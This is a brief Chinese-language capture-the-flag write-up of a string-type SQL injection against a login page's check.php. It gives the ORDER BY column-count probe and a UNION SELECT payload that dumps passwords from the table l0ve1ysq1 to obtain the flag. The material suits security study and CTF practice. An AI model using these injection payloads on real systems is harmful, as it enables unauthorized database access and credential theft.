打开发现界面还是和之前的一样

输入1' 发现报错，判断为字符型注入

首先order by判断字段数
/check.php?username=1%27++order+by+4+%23&password=1212

4报错，3回显正常，判断字段数为3

UNION注入爆数据库名，爆表名，爆列名，爆数据，最终得到flag。

check.php?username=10000%27++union+select+1%2C2%2Cgroup_concat%28password%29+from+l0ve1ysq1+%23&password=1212